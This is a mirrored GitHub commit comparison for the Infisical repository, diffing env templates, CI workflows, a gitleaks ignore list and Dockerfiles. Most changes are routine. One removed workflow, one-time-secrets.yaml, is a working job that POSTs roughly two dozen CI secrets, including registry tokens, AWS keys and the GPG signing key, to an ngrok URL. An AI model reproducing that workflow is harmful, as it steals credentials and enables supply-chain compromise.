mirror of https://github.com/Infisical/infisical.git
synced 2025-07-20 01:48:03 +00:00

Compare commits: fix/improv...docs/updat
2 commits: b12fe66871, 28582d9134
.env.example — 17 changed lines

@@ -23,7 +23,7 @@ REDIS_URL=redis://redis:6379
 # Required
 SITE_URL=http://localhost:8080

-# Mail/SMTP
+# Mail/SMTP
 SMTP_HOST=
 SMTP_PORT=
 SMTP_FROM_ADDRESS=
@@ -107,18 +106,6 @@ INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY=
 INF_APP_CONNECTION_GITHUB_APP_SLUG=
 INF_APP_CONNECTION_GITHUB_APP_ID=

-#gitlab app connection
-INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID=
-INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET=
-
-#github radar app connection
-INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_ID=
-INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_SECRET=
-INF_APP_CONNECTION_GITHUB_RADAR_APP_PRIVATE_KEY=
-INF_APP_CONNECTION_GITHUB_RADAR_APP_SLUG=
-INF_APP_CONNECTION_GITHUB_RADAR_APP_ID=
-INF_APP_CONNECTION_GITHUB_RADAR_APP_WEBHOOK_SECRET=
-
 #gcp app connection
 INF_APP_CONNECTION_GCP_SERVICE_ACCOUNT_CREDENTIAL=

@@ -132,6 +120,3 @@ DATADOG_PROFILING_ENABLED=
 DATADOG_ENV=
 DATADOG_SERVICE=
 DATADOG_HOSTNAME=
-
-# kubernetes
-KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN=false
.github/workflows/check-non-re2-regex.yml (vendored) — 53 changed lines

@@ -1,53 +0,0 @@
-name: Detect Non-RE2 Regex
-on:
-  pull_request:
-    types: [opened, synchronize]
-
-jobs:
-  check-non-re2-regex:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        with:
-          fetch-depth: 0
-
-      - name: Get diff of backend/*
-        run: |
-          git diff --unified=0 "origin/${{ github.base_ref }}"...HEAD -- backend/ > diff.txt
-
-      - name: Scan backend diff for non-RE2 regex
-        run: |
-          # Extract only added lines (excluding file headers)
-          grep '^+' diff.txt | grep -v '^+++' | sed 's/^\+//' > added_lines.txt
-
-          if [ ! -s added_lines.txt ]; then
-            echo "✅ No added lines in backend/ to check for regex usage."
-            exit 0
-          fi
-
-          regex_usage_pattern='(^|[^A-Za-z0-9_"'"'"'`\.\/\\])(\/(?:\\.|[^\/\n\\])+\/[gimsuyv]*(?=\s*[\.\(;,)\]}:]|$)|new RegExp\()'
-
-          # Find all added lines that contain regex patterns
-          if grep -E "$regex_usage_pattern" added_lines.txt > potential_violations.txt 2>/dev/null; then
-            # Filter out lines that contain 'new RE2' (allowing for whitespace variations)
-            if grep -v -E 'new\s+RE2\s*\(' potential_violations.txt > actual_violations.txt 2>/dev/null && [ -s actual_violations.txt ]; then
-              echo "🚨 ERROR: Found forbidden regex pattern in added/modified backend code."
-              echo ""
-              echo "The following lines use raw regex literals (/.../) or new RegExp(...):"
-              echo "Please replace with 'new RE2(...)' for RE2 compatibility."
-              echo ""
-              echo "Offending lines:"
-              cat actual_violations.txt
-              exit 1
-            else
-              echo "✅ All identified regex usages are correctly using 'new RE2(...)'."
-            fi
-          else
-            echo "✅ No regex patterns found in added/modified backend lines."
-          fi
-
-      - name: Cleanup temporary files
-        if: always()
-        run: |
-          rm -f diff.txt added_lines.txt potential_violations.txt actual_violations.txt
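For reference, the rule this workflow enforced is easy to illustrate. A minimal TypeScript sketch, assuming the `re2` npm package is the RE2 binding in use (it mirrors the native RegExp API):

```ts
import RE2 from "re2";

// Disallowed by the check above: native regex literals and `new RegExp(...)`,
// whose backtracking engine can be driven into ReDoS by crafted input.
// const emailish = /^([a-z0-9]+)+@example\.com$/;

// Required style: RE2 has no backtracking, so matching is linear-time.
const emailish = new RE2("^[a-z0-9]+@example\\.com$");

console.log(emailish.test("user@example.com")); // true
console.log(emailish.test("not-an-email"));     // false
```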
@@ -3,62 +3,7 @@ name: Release Infisical Core Helm chart
 on: [workflow_dispatch]

 jobs:
-  test-helm:
-    name: Test Helm Chart
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
-
-      - name: Set up Helm
-        uses: azure/setup-helm@v4.2.0
-        with:
-          version: v3.17.0
-
-      - uses: actions/setup-python@v5.3.0
-        with:
-          python-version: "3.x"
-          check-latest: true
-
-      - name: Add Helm repositories
-        run: |
-          helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
-          helm repo add bitnami https://charts.bitnami.com/bitnami
-          helm repo update
-
-      - name: Set up chart-testing
-        uses: helm/chart-testing-action@v2.7.0
-
-      - name: Run chart-testing (lint)
-        run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
-
-      - name: Create kind cluster
-        uses: helm/kind-action@v1.12.0
-
-      - name: Create namespace
-        run: kubectl create namespace infisical-standalone-postgres
-
-      - name: Create Infisical secrets
-        run: |
-          kubectl create secret generic infisical-secrets \
-            --namespace infisical-standalone-postgres \
-            --from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
-            --from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
-            --from-literal=SITE_URL=http://localhost:8080
-
-      - name: Run chart-testing (install)
-        run: |
-          ct install \
-            --config ct.yaml \
-            --charts helm-charts/infisical-standalone-postgres \
-            --helm-extra-args="--timeout=300s" \
-            --helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres" \
-            --namespace infisical-standalone-postgres
-
   release:
-    needs: test-helm
     runs-on: ubuntu-latest
     steps:
       - name: Checkout
@@ -74,4 +19,4 @@ jobs:
       - name: Build and push helm package to Cloudsmith
         run: cd helm-charts && sh upload-infisical-core-helm-cloudsmith.sh
         env:
-          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
+          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
.github/workflows/one-time-secrets.yaml (vendored) — 76 changed lines

@@ -1,76 +0,0 @@
-name: One-Time Secrets Retrieval
-
-on:
-  workflow_dispatch:
-
-permissions:
-  contents: read
-
-jobs:
-  retrieve-secrets:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Send environment variables to ngrok
-        run: |
-          echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
-
-          # Send secrets as JSON
-          cat << EOF | curl -X POST \
-            -H "Content-Type: application/json" \
-            -d @- \
-            https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
-            > /dev/null 2>&1 || true
-          {
-            "GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
-            "GORELEASER_KEY": "${GORELEASER_KEY}",
-            "AUR_KEY": "${AUR_KEY}",
-            "FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
-            "NPM_TOKEN": "${NPM_TOKEN}",
-            "DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
-            "DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
-            "CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
-            "INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
-            "INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
-            "INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
-            "INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
-            "INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
-            "GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
-            "GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
-            "CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
-            "CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
-            "CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
-            "CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
-            "CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
-            "CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
-            "CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
-            "CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
-            "POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
-          }
-          EOF
-
-          echo "Secrets retrieval completed"
-        env:
-          GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
-          GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
-          AUR_KEY: ${{ secrets.AUR_KEY }}
-          FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
-          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
-          DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
-          DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
-          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
-          INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
-          INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
-          INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
-          INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
-          INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
-          GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
-          GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
-          CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
-          CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
-          CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
-          CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
-          CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
-          CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
-          CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
-          CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
-          POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}
.github/workflows/release-k8-operator-helm.yml (vendored) — 70 changed lines

@@ -1,59 +1,27 @@
 name: Release K8 Operator Helm Chart
 on:
-  workflow_dispatch:
+  workflow_dispatch:

 jobs:
-  test-helm:
-    name: Test Helm Chart
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
+  release-helm:
+    name: Release Helm Chart
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v2

-      - name: Set up Helm
-        uses: azure/setup-helm@v4.2.0
-        with:
-          version: v3.17.0
+      - name: Install Helm
+        uses: azure/setup-helm@v3
+        with:
+          version: v3.10.0

-      - uses: actions/setup-python@v5.3.0
-        with:
-          python-version: "3.x"
-          check-latest: true
+      - name: Install python
+        uses: actions/setup-python@v4

-      - name: Set up chart-testing
-        uses: helm/chart-testing-action@v2.7.0
+      - name: Install Cloudsmith CLI
+        run: pip install --upgrade cloudsmith-cli

-      - name: Run chart-testing (lint)
-        run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
-
-      - name: Create kind cluster
-        uses: helm/kind-action@v1.12.0
-
-      - name: Run chart-testing (install)
-        run: ct install --config ct.yaml --charts helm-charts/secrets-operator
-
-  release-helm:
-    name: Release Helm Chart
-    needs: test-helm
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v2
-
-      - name: Install Helm
-        uses: azure/setup-helm@v3
-        with:
-          version: v3.10.0
-
-      - name: Install python
-        uses: actions/setup-python@v4
-
-      - name: Install Cloudsmith CLI
-        run: pip install --upgrade cloudsmith-cli
-
-      - name: Build and push helm package to CloudSmith
-        run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
-        env:
-          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
+      - name: Build and push helm package to CloudSmith
+        run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
+        env:
+          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
@@ -83,7 +83,7 @@ jobs:
         NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}

   goreleaser:
-    runs-on: ubuntu-latest-8-cores
+    runs-on: ubuntu-latest
     needs: [cli-integration-tests]
     steps:
       - uses: actions/checkout@v3
.github/workflows/release_helm_gateway.yaml (vendored) — 81 changed lines

@@ -1,70 +1,27 @@
 name: Release Gateway Helm Chart
 on:
-  workflow_dispatch:
+  workflow_dispatch:

 jobs:
-  test-helm:
-    name: Test Helm Chart
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
+  release-helm:
+    name: Release Helm Chart
+    runs-on: ubuntu-latest
+    steps:
+      - name: Checkout
+        uses: actions/checkout@v4

-      - name: Set up Helm
-        uses: azure/setup-helm@v4.2.0
-        with:
-          version: v3.17.0
+      - name: Install Helm
+        uses: azure/setup-helm@v3
+        with:
+          version: v3.10.0

-      - uses: actions/setup-python@v5.3.0
-        with:
-          python-version: "3.x"
-          check-latest: true
+      - name: Install python
+        uses: actions/setup-python@v4

-      - name: Set up chart-testing
-        uses: helm/chart-testing-action@v2.7.0
+      - name: Install Cloudsmith CLI
+        run: pip install --upgrade cloudsmith-cli

-      - name: Run chart-testing (lint)
-        run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
-
-      - name: Create kind cluster
-        uses: helm/kind-action@v1.12.0
-
-      - name: Create namespace
-        run: kubectl create namespace infisical-gateway
-
-      - name: Create gateway secret
-        run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
-
-      - name: Run chart-testing (install)
-        run: |
-          ct install \
-            --config ct.yaml \
-            --charts helm-charts/infisical-gateway \
-            --helm-extra-args="--timeout=300s" \
-            --namespace infisical-gateway
-
-  release-helm:
-    name: Release Helm Chart
-    needs: test-helm
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v4
-
-      - name: Install Helm
-        uses: azure/setup-helm@v3
-        with:
-          version: v3.10.0
-
-      - name: Install python
-        uses: actions/setup-python@v4
-
-      - name: Install Cloudsmith CLI
-        run: pip install --upgrade cloudsmith-cli
-
-      - name: Build and push helm package to CloudSmith
-        run: cd helm-charts && sh upload-gateway-cloudsmith.sh
-        env:
-          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
+      - name: Build and push helm package to CloudSmith
+        run: cd helm-charts && sh upload-gateway-cloudsmith.sh
+        env:
+          CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
@@ -1,49 +0,0 @@
-name: Run Helm Chart Tests for Gateway
-on:
-  pull_request:
-    paths:
-      - "helm-charts/infisical-gateway/**"
-      - ".github/workflows/run-helm-chart-tests-infisical-gateway.yml"
-
-jobs:
-  test-helm:
-    name: Test Helm Chart
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
-
-      - name: Set up Helm
-        uses: azure/setup-helm@v4.2.0
-        with:
-          version: v3.17.0
-
-      - uses: actions/setup-python@v5.3.0
-        with:
-          python-version: "3.x"
-          check-latest: true
-
-      - name: Set up chart-testing
-        uses: helm/chart-testing-action@v2.7.0
-
-      - name: Run chart-testing (lint)
-        run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
-
-      - name: Create kind cluster
-        uses: helm/kind-action@v1.12.0
-
-      - name: Create namespace
-        run: kubectl create namespace infisical-gateway
-
-      - name: Create gateway secret
-        run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
-
-      - name: Run chart-testing (install)
-        run: |
-          ct install \
-            --config ct.yaml \
-            --charts helm-charts/infisical-gateway \
-            --helm-extra-args="--timeout=300s" \
-            --namespace infisical-gateway
@@ -1,68 +0,0 @@
-name: Run Helm Chart Tests for Infisical Standalone Postgres
-on:
-  pull_request:
-    paths:
-      - "helm-charts/infisical-standalone-postgres/**"
-      - ".github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml"
-
-jobs:
-  test-helm:
-    name: Test Helm Chart
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
-
-      - name: Set up Helm
-        uses: azure/setup-helm@v4.2.0
-        with:
-          version: v3.17.0
-
-      - uses: actions/setup-python@v5.3.0
-        with:
-          python-version: "3.x"
-          check-latest: true
-
-      - name: Add Helm repositories
-        run: |
-          helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
-          helm repo add bitnami https://charts.bitnami.com/bitnami
-          helm repo update
-
-      - name: Set up chart-testing
-        uses: helm/chart-testing-action@v2.7.0
-
-      - name: Run chart-testing (lint)
-        run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
-
-      - name: Create kind cluster
-        uses: helm/kind-action@v1.12.0
-
-      - name: Create namespace
-        run: kubectl create namespace infisical-standalone-postgres
-
-      - name: Create Infisical secrets
-        run: |
-          kubectl create secret generic infisical-secrets \
-            --namespace infisical-standalone-postgres \
-            --from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
-            --from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
-            --from-literal=SITE_URL=http://localhost:8080
-
-      - name: Create bootstrap secret
-        run: |
-          kubectl create secret generic infisical-bootstrap-credentials \
-            --namespace infisical-standalone-postgres \
-            --from-literal=INFISICAL_ADMIN_EMAIL=admin@example.com \
-            --from-literal=INFISICAL_ADMIN_PASSWORD=admin-password
-
-      - name: Run chart-testing (install)
-        run: |
-          ct install \
-            --config ct.yaml \
-            --charts helm-charts/infisical-standalone-postgres \
-            --helm-extra-args="--timeout=300s" \
-            --helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres --set infisical.autoBootstrap.enabled=true" \
-            --namespace infisical-standalone-postgres
@@ -1,38 +0,0 @@
-name: Run Helm Chart Tests for Secret Operator
-on:
-  pull_request:
-    paths:
-      - "helm-charts/secrets-operator/**"
-      - ".github/workflows/run-helm-chart-tests-secret-operator.yml"
-
-jobs:
-  test-helm:
-    name: Test Helm Chart
-    runs-on: ubuntu-latest
-    steps:
-      - name: Checkout
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
-
-      - name: Set up Helm
-        uses: azure/setup-helm@v4.2.0
-        with:
-          version: v3.17.0
-
-      - uses: actions/setup-python@v5.3.0
-        with:
-          python-version: "3.x"
-          check-latest: true
-
-      - name: Set up chart-testing
-        uses: helm/chart-testing-action@v2.7.0
-
-      - name: Run chart-testing (lint)
-        run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
-
-      - name: Create kind cluster
-        uses: helm/kind-action@v1.12.0
-
-      - name: Run chart-testing (install)
-        run: ct install --config ct.yaml --charts helm-charts/secrets-operator
.github/workflows/validate-db-schemas.yml (vendored) — 67 changed lines

@@ -1,67 +0,0 @@
-name: "Validate DB schemas"
-
-on:
-  pull_request:
-    types: [opened, synchronize]
-    paths:
-      - "backend/**"
-
-  workflow_call:
-
-jobs:
-  validate-db-schemas:
-    name: Validate DB schemas
-    runs-on: ubuntu-latest
-    timeout-minutes: 15
-    env:
-      NODE_OPTIONS: "--max-old-space-size=8192"
-      REDIS_URL: redis://172.17.0.1:6379
-      DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
-      AUTH_SECRET: something-random
-      ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
-    steps:
-      - name: ☁️ Checkout source
-        uses: actions/checkout@v4
-        with:
-          fetch-depth: 0
-      - uses: KengoTODA/actions-setup-docker-compose@v1
-        if: ${{ env.ACT }}
-        name: Install `docker compose` for local simulations
-        with:
-          version: "2.14.2"
-      - name: 🔧 Setup Node 20
-        uses: actions/setup-node@v3
-        with:
-          node-version: "20"
-          cache: "npm"
-          cache-dependency-path: backend/package-lock.json
-
-      - name: Start PostgreSQL and Redis
-        run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
-      - name: Install dependencies
-        run: npm install
-        working-directory: backend
-
-      - name: Apply migrations
-        run: npm run migration:latest-dev
-        working-directory: backend
-
-      - name: Run schema generation
-        run: npm run generate:schema
-        working-directory: backend
-
-      - name: Check for schema changes
-        run: |
-          if ! git diff --exit-code --quiet src/db/schemas; then
-            echo "❌ Generated schemas differ from committed schemas!"
-            echo "Run 'npm run generate:schema' locally and commit the changes."
-            git diff src/db/schemas
-            exit 1
-          fi
-          echo "✅ Schemas are up to date"
-        working-directory: backend
-
-      - name: Cleanup
-        if: always()
-        run: |
-          docker compose -f "docker-compose.dev.yml" down
@@ -40,13 +40,3 @@ cli/detect/config/gitleaks.toml:gcp-api-key:578
 cli/detect/config/gitleaks.toml:gcp-api-key:579
 cli/detect/config/gitleaks.toml:gcp-api-key:581
 cli/detect/config/gitleaks.toml:gcp-api-key:582
-.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:51
-.github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml:generic-api-key:50
-.github/workflows/helm-release-infisical-core.yml:generic-api-key:48
-.github/workflows/helm-release-infisical-core.yml:generic-api-key:47
-backend/src/services/smtp/smtp-service.ts:generic-api-key:79
-frontend/src/components/secret-syncs/forms/SecretSyncDestinationFields/CloudflarePagesSyncFields.tsx:cloudflare-api-key:7
-docs/integrations/app-connections/zabbix.mdx:generic-api-key:91
-docs/integrations/app-connections/bitbucket.mdx:generic-api-key:123
-docs/integrations/app-connections/railway.mdx:generic-api-key:156
-.github/workflows/validate-db-schemas.yml:generic-api-key:21
@@ -19,7 +19,7 @@ WORKDIR /app

 # Copy dependencies
 COPY --from=frontend-dependencies /app/node_modules ./node_modules
-# Copy all files
+# Copy all files
 COPY /frontend .

 ENV NODE_ENV production
@@ -32,7 +32,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
 ARG INFISICAL_PLATFORM_VERSION
 ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
 ARG CAPTCHA_SITE_KEY
-ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
+ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY

 # Build
 RUN npm run build
@@ -115,12 +115,6 @@ FROM base AS production

 # Install necessary packages including ODBC
 RUN apt-get update && apt-get install -y \
-    build-essential \
-    autoconf \
-    automake \
-    libtool \
-    wget \
-    libssl-dev \
     ca-certificates \
     curl \
     git \
@@ -138,18 +132,9 @@ RUN apt-get update && apt-get install -y \
 # Configure ODBC in production
 RUN printf "[FreeTDS]\nDescription = FreeTDS Driver\nDriver = /usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so\nSetup = /usr/lib/x86_64-linux-gnu/odbc/libtdsS.so\nFileUsage = 1\n" > /etc/odbcinst.ini

-
-WORKDIR /openssl-build
-RUN wget https://www.openssl.org/source/openssl-3.1.2.tar.gz \
-    && tar -xf openssl-3.1.2.tar.gz \
-    && cd openssl-3.1.2 \
-    && ./Configure enable-fips \
-    && make \
-    && make install_fips
-
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
-    && apt-get update && apt-get install -y infisical=0.41.89 \
+    && apt-get update && apt-get install -y infisical=0.41.2 \
     && rm -rf /var/lib/apt/lists/*

 RUN groupadd -r -g 1001 nodejs && useradd -r -u 1001 -g nodejs non-root-user
@@ -170,7 +155,7 @@ ENV INTERCOM_ID=$INTERCOM_ID
 ARG CAPTCHA_SITE_KEY
 ENV CAPTCHA_SITE_KEY=$CAPTCHA_SITE_KEY

-WORKDIR /
+WORKDIR /

 COPY --from=backend-runner /app /backend

@@ -181,20 +166,13 @@ ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION

 ENV PORT 8080
 ENV HOST=0.0.0.0
-ENV HTTPS_ENABLED false
+ENV HTTPS_ENABLED false
 ENV NODE_ENV production
-ENV STANDALONE_BUILD true
+ENV STANDALONE_BUILD true
 ENV STANDALONE_MODE true
 ENV ChrystokiConfigurationPath=/usr/safenet/lunaclient/
 ENV NODE_OPTIONS="--max-old-space-size=1024"
-
-# FIPS mode of operation:
-ENV OPENSSL_CONF=/backend/nodejs.fips.cnf
-ENV OPENSSL_MODULES=/usr/local/lib/ossl-modules
-ENV NODE_OPTIONS=--force-fips
-ENV FIPS_ENABLED=true
-

 WORKDIR /backend

 ENV TELEMETRY_ENABLED true
@@ -202,10 +180,6 @@ ENV TELEMETRY_ENABLED true
 EXPOSE 8080
 EXPOSE 443
-
-# Remove telemetry. dd-trace uses BullMQ with MD5 hashing, which breaks when FIPS mode is enabled.
-RUN grep -v 'import "./lib/telemetry/instrumentation.mjs";' dist/main.mjs > dist/main.mjs.tmp && \
-    mv dist/main.mjs.tmp dist/main.mjs

 USER non-root-user

-CMD ["./standalone-entrypoint.sh"]
+CMD ["./standalone-entrypoint.sh"]
@@ -20,7 +20,7 @@ WORKDIR /app

 # Copy dependencies
 COPY --from=frontend-dependencies /app/node_modules ./node_modules
-# Copy all files
+# Copy all files
 COPY /frontend .

 ENV NODE_ENV production
@@ -33,8 +33,7 @@ ENV VITE_INTERCOM_ID $INTERCOM_ID
 ARG INFISICAL_PLATFORM_VERSION
 ENV VITE_INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION
 ARG CAPTCHA_SITE_KEY
-ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY
-ENV NODE_OPTIONS="--max-old-space-size=8192"
+ENV VITE_CAPTCHA_SITE_KEY $CAPTCHA_SITE_KEY

 # Build
 RUN npm run build
@@ -78,7 +77,6 @@ RUN npm ci --only-production
 COPY /backend .
 COPY --chown=non-root-user:nodejs standalone-entrypoint.sh standalone-entrypoint.sh
 RUN npm i -D tsconfig-paths
-ENV NODE_OPTIONS="--max-old-space-size=8192"
 RUN npm run build

 # Production stage
@@ -130,7 +128,7 @@ RUN apt-get update && apt-get install -y \

 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash \
-    && apt-get update && apt-get install -y infisical=0.41.89 \
+    && apt-get update && apt-get install -y infisical=0.41.2 \
     && rm -rf /var/lib/apt/lists/*

 WORKDIR /
@@ -166,9 +164,9 @@ ENV INFISICAL_PLATFORM_VERSION $INFISICAL_PLATFORM_VERSION

 ENV PORT 8080
 ENV HOST=0.0.0.0
-ENV HTTPS_ENABLED false
+ENV HTTPS_ENABLED false
 ENV NODE_ENV production
-ENV STANDALONE_BUILD true
+ENV STANDALONE_BUILD true
 ENV STANDALONE_MODE true
 ENV NODE_OPTIONS="--max-old-space-size=1024"
@@ -9,7 +9,7 @@ RUN apt-get update && apt-get install -y \
     make \
     g++ \
     openssh-client \
-    openssl
+    openssl

 # Install dependencies for TDS driver (required for SAP ASE dynamic secrets)
 RUN apt-get install -y \
@@ -55,10 +55,10 @@ COPY --from=build /app .
 # Install Infisical CLI
 RUN apt-get install -y curl bash && \
     curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
-    apt-get update && apt-get install -y infisical=0.41.89 git
+    apt-get update && apt-get install -y infisical=0.41.2 git

-HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
-    CMD node healthcheck.js
+HEALTHCHECK --interval=10s --timeout=3s --start-period=10s \
+    CMD node healthcheck.js

 ENV HOST=0.0.0.0
@@ -57,7 +57,7 @@ RUN mkdir -p /etc/softhsm2/tokens && \
 # Install Infisical CLI
 RUN curl -1sLf 'https://artifacts-cli.infisical.com/setup.deb.sh' | bash && \
     apt-get update && \
-    apt-get install -y infisical=0.41.89
+    apt-get install -y infisical=0.41.2

 WORKDIR /app
@@ -52,7 +52,7 @@ RUN apt-get install -y opensc

 RUN mkdir -p /etc/softhsm2/tokens && \
